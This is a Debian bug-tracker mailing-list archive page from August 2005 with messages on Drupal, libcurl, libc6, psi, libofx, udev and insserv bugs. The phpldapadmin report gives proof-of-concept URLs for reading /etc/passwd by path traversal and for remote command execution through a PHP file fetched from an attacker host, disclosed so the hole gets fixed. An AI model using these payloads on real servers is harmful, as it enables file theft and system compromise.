Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: drupal
Severity: grave
Tags: security
Justification: user security hole

[I'm pretty sure you are already aware of it; but here it is anyway]

Another XMLRPC vulnerability has been detected that affects Drupal
as well. Please see http://www.hardened-php.net/advisory_142005.66.html
for information about the issue in general. 

The new upstream release 4.5.4 resolves this issue.

Cheers,
Moritz

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-rc5
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)

---
Received: (at 323347-done) by bugs.debian.org; 30 Aug 2005 20:32:08 +
From [EMAIL PROTECTED] Tue Aug 30 13:32:07 2005
Return-path: [EMAIL PROTECTED]
Received: from dsl093-039-086.pdx1.dsl.speakeasy.net (tennyson.netexpress.net) 
[66.93.39.86] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EACm7-0002fJ-00; Tue, 30 Aug 2005 13:32:07 -0700
Received: by tennyson.netexpress.net (Postfix, from userid 1003)
id C79FC7049; Tue, 30 Aug 2005 13:32:06 -0700 (PDT)
Date: Tue, 30 Aug 2005 13:32:06 -0700
From: Steve Langasek [EMAIL PROTECTED]
To: Karoly Negyesi [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [drupal-devel] Bug#323347: Another XMLRPC issue in drupal
Message-ID: [EMAIL PROTECTED]
References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL 
PROTECTED]
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol=application/pgp-signature; boundary=f+W+jCU1fRNres8c
Content-Disposition: inline
In-Reply-To: [EMAIL PROTECTED]
User-Agent: Mutt/1.5.9i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02


--f+W+jCU1fRNres8c
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Version: 4.5.5-1

On Tue, Aug 30, 2005 at 10:17:18PM +0200, Karoly Negyesi wrote:
  The new upstream release 4.5.4 resolves this issue.
 
 If the bugs are fixed in the current version then they should be closed
 *now*, not waiting until the next upload.

 Version 4.5.5 (and 4.6.3) does not have an XML-RPC security hole to our =
=20
 best knowledge.

Then I'm closing this bug, so that we can get the security-fixed version
of drupal into testing today.

Thanks,
--=20
Steve Langasek   Give me a lever 

Bug#325643: libcurl and moc

2005-08-30 Thread Daniel Stenberg

Hi

The problem you have with libcurl and OpenSSL/GnuTLS is not strictly an 
upstream problem.


In the curl project there are some ideas floating around that are being 
discussed on how this could be fixed for Debian (and other distros) but that 
is only because they don't do it themselves, it is not because it is an actual 
problem in the curl camp. It is more of an indirect annoyance.


Also, discussions are only talk. There is no fix or solution in the work for 
the nearest period of time. Everyone's invited to come help sort it out.


In my view, there's only one available work-around for the short to mid term, 
and that is to use a separate .so file for libcurl built with GnuTLS.


--
 -=- Daniel Stenberg -=- http://daniel.haxx.se -=-
  ech`echo xiun|tr nu oc|sed 'sx\([sx]\)\([xoi]\)xo un\2\1 is xg'`ol


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 318176 to libmagick6, merging 318176 325651

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.8.14
 reassign 318176 libmagick6
Bug#318176: imagemagick in combination with transcode fails (amd64)
Bug#325651: ale: unable to open image `[mangled file name]': No such file or 
directory.
Bug#325720: File read error
Bug reassigned from package `libmagick6' to `libmagick6'.

 merge 318176 325651
Bug#318176: imagemagick in combination with transcode fails (amd64)
Bug#325651: ale: unable to open image `[mangled file name]': No such file or 
directory.
Bug#325720: File read error
Merged 318176 325651 325720.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325757: marked as done (sparc32: catch-22 between kernel-image-2.4 and libc6_2.3.2.ds1-22)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 13:55:19 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#325757: sparc32: catch-22 between kernel-image-2.4 and 
libc6_2.3.2.ds1-22
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 30 Aug 2005 18:47:00 +
From [EMAIL PROTECTED] Tue Aug 30 11:47:00 2005
Return-path: [EMAIL PROTECTED]
Received: from sony-csl-2.clients.easynet.fr (smtp.csl.sony.fr) [212.11.40.130] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EAB8O-0003mk-00; Tue, 30 Aug 2005 11:47:00 -0700
Received: from localhost (localhost [127.0.0.1])
by smtp.csl.sony.fr (Postfix) with ESMTP id 2F779FE92E
for [EMAIL PROTECTED]; Tue, 30 Aug 2005 20:46:29 +0200 (CEST)
Received: from smtp.csl.sony.fr ([127.0.0.1])
by localhost (mail [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
id 10654-06 for [EMAIL PROTECTED];
Tue, 30 Aug 2005 20:46:22 +0200 (CEST)
Received: from [10.0.1.70] (sony-csl-5.clients.easynet.fr [212.11.40.133])
by smtp.csl.sony.fr (Postfix) with ESMTP id 6D76EFE8F8
for [EMAIL PROTECTED]; Tue, 30 Aug 2005 20:46:22 +0200 (CEST)
Message-ID: [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 20:47:13 +0200
From: Peter Hanappe [EMAIL PROTECTED]
User-Agent: Debian Thunderbird 1.0.2 (X11/20050602)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: sparc32: catch-22 between kernel-image-2.4 and libc6_2.3.2.ds1-22
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at csl.sony.fr
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: libc6
Version: 2.3.2.ds1-22
Severity: grave

On sparc32/sun4m:

I'm upgrading from kernel 2.2.20 to 2.4.27 using the command:

# apt-get install -f kernel-image-2.4.27-2-sparc32

The kernel package depends on libc6_2.3.2.ds1-22_sparc.
The installation of libc6 fails with the message:

   WARNING: You have a cpu which requires kernel 2.4.21
   or greater in order to install this version of glibc.
   Please upgrade the kernel before installing this package.

kernel 2.4.27 requires libc6_2.3.2 but libc6_2.3.2 requires kernel
2.4.21 or greater. Any solutions?

Thanks
Peter Hanappe


---
Received: (at 325757-done) by bugs.debian.org; 30 Aug 2005 20:55:21 +
From [EMAIL PROTECTED] Tue Aug 30 13:55:20 2005
Return-path: [EMAIL PROTECTED]
Received: from dsl093-039-086.pdx1.dsl.speakeasy.net (tennyson.netexpress.net) 
[66.93.39.86] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EAD8a-IL-00; Tue, 30 Aug 2005 13:55:20 -0700
Received: by tennyson.netexpress.net (Postfix, from userid 1003)
id 80C9C7049; Tue, 30 Aug 2005 13:55:19 -0700 (PDT)
Date: Tue, 30 Aug 2005 13:55:19 -0700
From: Steve Langasek [EMAIL PROTECTED]
To: Thiemo Seufer [EMAIL PROTECTED], [EMAIL PROTECTED]
Cc: Peter Hanappe [EMAIL PROTECTED]
Subject: Re: Bug#325757: sparc32: catch-22 between kernel-image-2.4 and 
libc6_2.3.2.ds1-22
Message-ID: [EMAIL PROTECTED]
References: [EMAIL PROTECTED] [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol=application/pgp-signature; boundary=tMbDGjvJuJijemkf
Content-Disposition: inline
In-Reply-To: [EMAIL PROTECTED]
User-Agent: Mutt/1.5.9i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02


--tMbDGjvJuJijemkf
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Aug 30, 2005 at 09:53:31PM +0200, Thiemo Seufer wrote:
 Peter Hanappe wrote:
  Package: libc6
  Version: 2.3.2.ds1-22
  Severity: grave

  On sparc32/sun4m:

  I'm upgrading from kernel 2.2.20 to 2.4.27 using the command:

  # apt-get install -f kernel-image-2.4.27-2-sparc32

  The kernel package depends on libc6_2.3.2.ds1-22_sparc.
  The installation of libc6 fails with the message:

 

Bug#325785: phpldapadmin: system disclosure

2005-08-30 Thread Neil McGovern
Package: phpldapadmin
Version: 0.9.6c-6
Severity: critical
Tags: security
Justification: root security hole

if unpatched and vulnerable, a user can see any file on target system,
poc:


http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

a user can also execute arbitrary php code and system commands:


http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this:

?php system('[some_command]); ?

also a user can craft a malicious url to include malicious client
side code that will be executed in the security contest of the
victim browser

original advisory: http://www.rgod.altervista.org/phpldap.html


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#318946: Bad press again...

2005-08-30 Thread Florian Weimer
* Paul Gear:

 The maintainer is not the problem.  Lorenzo has prepared 2.2.3-2 for
 sarge [1] and has tested the before and after situations and found that
 the bug is fixed.  The problem is no response from Martin Schulze.

 [1] http://idea.sec.dico.unimi.it/~lorenzo/tmp/

This information should be added to the bug report, otherwise others
might duplicate his work.

This is part of the reason why I suggested to Cc: bug reports when
interacting with the security team (if possible, that is for
post-disclousre discussion).


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#207549: marked as done ([NONFREE-DOC] copyright status of some documents unclear)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 14:29:26 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#207549: fixed in doc-debian 3.1.2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 27 Aug 2003 20:31:57 +
From [EMAIL PROTECTED] Wed Aug 27 15:29:44 2003
Return-path: [EMAIL PROTECTED]
Received: from sinma-gmbh.17.mind.de (gw.enyo.de) [212.21.92.17] 
by master.debian.org with esmtp (Exim 3.35 1 (Debian))
id 19s6vG-0006k9-00; Wed, 27 Aug 2003 15:29:42 -0500
Received: from deneb.enyo.de ([212.9.189.171])
by mail.enyo.de with esmtp (Exim 4.20)
id 19s6vF-00030m-CT
for [EMAIL PROTECTED]; Wed, 27 Aug 2003 22:29:41 +0200
Received: from fw by deneb.enyo.de with local (Exim 4.20)
id 19s6vF-00015a-91; Wed, 27 Aug 2003 22:29:41 +0200
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=ISO-8859-1
From: Florian Weimer [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: doc-debian: copyright status of some documents unclear
X-Mailer: reportbug 2.24
Date: Wed, 27 Aug 2003 22:29:41 +0200
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-6.0 required=4.0
tests=BAYES_30,HAS_PACKAGE
version=2.53-bugs.debian.org_2003_8_27
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_8_27 
(1.174.2.15-2003-03-30-exp)

Package: doc-debian
Version: 3.0.2
Severity: serious
Justification: Policy 2.3

The debian/copyright file fails to list the copying conditions of
the files constitution.txt, social-contract.txt, mailing-lists.txt, and
source-unpack.txt.  (The latter is probably not copyrightable
in all jurisdictions, though.)

-- System Information:
Debian Release: testing/unstable
Architecture: i386
Kernel: Linux deneb 2.6.0-test4 #11 Wed Aug 27 14:16:28 CEST 2003 i686
Locale: LANG=C, LC_CTYPE=en_US

-- no debconf information


---
Received: (at 207549-close) by bugs.debian.org; 30 Aug 2005 21:38:34 +
From [EMAIL PROTECTED] Tue Aug 30 14:38:33 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EADfa-0004LM-00; Tue, 30 Aug 2005 14:29:26 -0700
From: Javier Fernandez-Sanguino Pen~a [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: lisa $Revision: 1.30 $
Subject: Bug#207549: fixed in doc-debian 3.1.2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 14:29:26 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: doc-debian
Source-Version: 3.1.2

We believe that the bug you reported is fixed in the latest version of
doc-debian, which is due to be installed in the Debian FTP archive:

doc-debian_3.1.2.dsc
  to pool/main/d/doc-debian/doc-debian_3.1.2.dsc
doc-debian_3.1.2.tar.gz
  to pool/main/d/doc-debian/doc-debian_3.1.2.tar.gz
doc-debian_3.1.2_all.deb
  to pool/main/d/doc-debian/doc-debian_3.1.2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Javier Fernandez-Sanguino Pen~a [EMAIL PROTECTED] (supplier of updated 
doc-debian package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu,  9 Jun 2005 15:54:20 +0200
Source: doc-debian
Binary: doc-debian
Architecture: source all
Version: 3.1.2
Distribution: unstable
Urgency: low
Maintainer: Josip Rodin [EMAIL PROTECTED]
Changed-By: Javier Fernandez-Sanguino Pen~a [EMAIL PROTECTED]
Description: 
 doc-debian - Debian Project documentation, Debian FAQ and other documents
Closes: 207549
Changes: 
 doc-debian (3.1.2) unstable; urgency=low
 .
   * Add OPL license since that's the license of the documents published
 in the website which are reused in this package (Closes: #207549)
   * Clean up 

Bug#323035: Processed: referring issue to technical committee

2005-08-30 Thread Robert McQueen
Raul Miller wrote:
 It's not clear to me why this was assigned to the technical committee.
 
 There's definitely some issues here.  For example, it sounds like libsilc
 has some bugs that need to be fixed.
 
 But is there any problem that the technical committee needs to decide on?

 If so, could someone clearly and simply state what this problem is?

The problem is that the maintainer refuses to concede that his packages
are in violation of Debian's shared library packaging policy, or
believes that this policy is incorrect or somehow irrelevant to his package.

I was hoping that the technical committee might be able to discern which
of these is the case, and then decide which elements need to be fixed
and by whom, in order that the adoption of SILC-based software may
continue in Debian.

However, it now seems that he's willing for someone else to maintain the
package (see his mail on #273871), so it might be in order to orphan the
package and close this technical committee bug.

 Thanks,

Regards,
Rob


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325484: udev = 0.060-1 and kernels = 2.6.12

2005-08-30 Thread Frans Pop
(pruning CC list; AFAIK all will still get the message this way)

On Tuesday 30 August 2005 04:56, Steve Langasek wrote:
  So we're going to have another release with a very elaborate upgrade
  procedure in the release notes (which a lot of users, especially
  desktop users, don't read anyway)?

 1) upgrade your kernel
 2) dist-upgrade

 That doesn't seem terribly elaborate to me?  And if people choose not
 to read, well, they get a failure on dist-upgrade and get to figure it
 out for themselves, I guess.

Yeah, and that IMHO is exactly the problem.
Debian used to be known for relatively trouble free upgrades. For the 
Woody-Sarge upgrade the upgrade problems (the kernel issues at least) 
were mostly limited to non-mainstream architectures, but now we're likely 
to hit 80% of Sarge desktop users.

BTW, here's a first example...
http://lists.debian.org/debian-boot/2005/08/msg01149.html
(the poster works for Intel)


pgpYIPmvKhPJ5.pgp
Description: PGP signature


Bug#325791: libofx2: stale debian/shlibs causes missing reverse dependencies

2005-08-30 Thread Aaron M. Ucko
Package: libofx2
Severity: serious
Justification: Policy 8.6

Hi, Thomas.

The libofx source package includes a debian/shlibs file that
inappropriately reads

libofx 1 libofx1c2

and evidently overrides dh_makeshlibs; as a result, packages such as
gnucash that build against the library fail to pick up appropriate
dependencies, because there is no shlibs entry for libofx.so.2.

Given that you *are* in fact using dh_makeshlibs, you should be able
to drop the file altogether; however, if you end up keeping it, please
ensure that its contents stay current.

Incidentally, I also noticed a libofx0c102.docs file that probably
ought to be renamed.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: amd64 (x86_64)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.3
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325379: python-cairo: undefined symbol: cairo_ps_surface_create

2005-08-30 Thread Dave Beckett
Yes, the postscript, PDF and OpenGL backends were removed at cairo 1.0.0
after upstream made them unsupported (for now) and the pycairo bindings
need a rebuild to reflect that.

Dave



signature.asc
Description: This is a digitally signed message part


Bug#290455: marked as done (psi: FTBFS (amd64/gcc-4.0): cast from 'QPopupMenu*' to 'int' loses precision)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 15:17:18 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#290455: fixed in psi 0.9.3-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 14 Jan 2005 08:53:59 +
From [EMAIL PROTECTED] Fri Jan 14 00:53:59 2005
Return-path: [EMAIL PROTECTED]
Received: from c158159.adsl.hansenet.de (localhost.localdomain) 
[213.39.158.159] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CpNDT-0001jk-00; Fri, 14 Jan 2005 00:53:59 -0800
Received: from aj by localhost.localdomain with local (Exim 4.34)
id 1CpNDR-0006sL-8t; Fri, 14 Jan 2005 09:53:57 +0100
To: Debian Bug Tracking System [EMAIL PROTECTED]
From: Andreas Jochens [EMAIL PROTECTED]
Subject: psi: FTBFS (amd64/gcc-4.0): cast from 'QPopupMenu*' to 'int' loses 
precision
Message-Id: [EMAIL PROTECTED]
Date: Fri, 14 Jan 2005 09:53:57 +0100
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: psi
Severity: normal
Tags: patch

When building 'psi' on amd64 with gcc-4.0,
I get the following error:

g++ -c -pipe -Wall -W -g -D_REENTRANT  -DHAVE_DNOTIFY -DHAVE_GETHOSTBYNAME_R 
-DHAVE_CONFIG -DXMPP_TEST -DQT_THREAD_SUPPORT -DQT_SHARED -DQT_NO_DEBUG 
-I/usr/share/qt3/mkspecs/default -I. -I../cutestuff/util -I../cutestuff/network 
-I../cutestuff/trayicon -I../cutestuff/idle -I../cutestuff/zip 
-I../cutestuff/dirwatch -I../cutestuff/openpgp -I../iris/libidn 
-I../iris/include -I../iris/xmpp-core -I../iris/xmpp-im -I../iris/jabber 
-I../libpsi/iconset -I../libpsi/psiwidgets -I../libpsi/psipng 
-I/usr/include/qt3 -I/usr/X11R6/include -I.ui/ -I. -Ioptions -I.moc/ -o 
.obj/iconaction.o ../libpsi/psiwidgets/iconaction.cpp
../libpsi/psiwidgets/iconaction.cpp: In member function 'void 
IconAction::Private::popupDestroyed(QObject*)':
../libpsi/psiwidgets/iconaction.cpp:74: error: cast from 'QPopupMenu*' to 'int' 
loses precision
../libpsi/psiwidgets/iconaction.cpp:74: error: cast from 'QObject*' to 'int' 
loses precision
make[2]: *** [.obj/iconaction.o] Error 1
make[2]: Leaving directory `/psi-0.9.3/src'

With the attached patch 'psi' can be compiled
on amd64 using gcc-4.0.

Regards
Andreas Jochens

diff -urN ../tmp-orig/psi-0.9.3/libpsi/psiwidgets/iconaction.cpp 
./libpsi/psiwidgets/iconaction.cpp
--- ../tmp-orig/psi-0.9.3/libpsi/psiwidgets/iconaction.cpp  2004-10-24 
11:42:19.0 +0200
+++ ./libpsi/psiwidgets/iconaction.cpp  2005-01-14 09:11:32.0 +0100
@@ -71,7 +71,7 @@
 
QMapQPopupMenu *, int::Iterator it = popups.begin();
for ( ; it != popups.end(); ++it ) {
-   if ( (int)it.key() == (int)obj ) {
+   if ( (long)it.key() == (long)obj ) {
dirty = true;
popups.remove( it );
break;

---
Received: (at 290455-close) by bugs.debian.org; 30 Aug 2005 22:19:04 +
From [EMAIL PROTECTED] Tue Aug 30 15:19:04 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EAEPu-0007Og-00; Tue, 30 Aug 2005 15:17:18 -0700
From: Jan Niehusmann [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#290455: fixed in psi 0.9.3-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 15:17:18 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: psi
Source-Version: 0.9.3-2

We believe that the bug you reported is fixed in the latest version of
psi, which is due to be installed in the Debian FTP archive:

psi_0.9.3-2.diff.gz
  to pool/main/p/psi/psi_0.9.3-2.diff.gz
psi_0.9.3-2.dsc
  to pool/main/p/psi/psi_0.9.3-2.dsc
psi_0.9.3-2_i386.deb
  to pool/main/p/psi/psi_0.9.3-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for 

Bug#325798: insserv: makes 2.6 kernel system unbootable and 2.4 system barely usable

2005-08-30 Thread Steve Langasek
On Wed, Aug 31, 2005 at 02:02:30AM +0300, Martin-Éric Racine wrote:

 Basically, this package should not have been allowed into unstable and is
 already of questionable use for Debian at this point, given Debian's
 extremely limitted LSB support. As such, I demand that it be
 immediately removed from the archive; if it ever gets reintroduced, it
 should first go to and be thoroughly tested via experimental. Thanks!

Er, there is nothing limited about Debian's support for LSB init
scripts.  You (and the maintainer of this package) seem to be making the
error of thinking that LSB support imposes requirements on how an
LSB-compliant OS manages its *own* init scripts.  It does not -- it only
specifies the features that an LSB-compliant OS must make available for
use by an LSB init script.  So yes, if insserv assumes that all Debian
initscripts are LSB init scripts, it is fundamentally broken.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


  1   2   >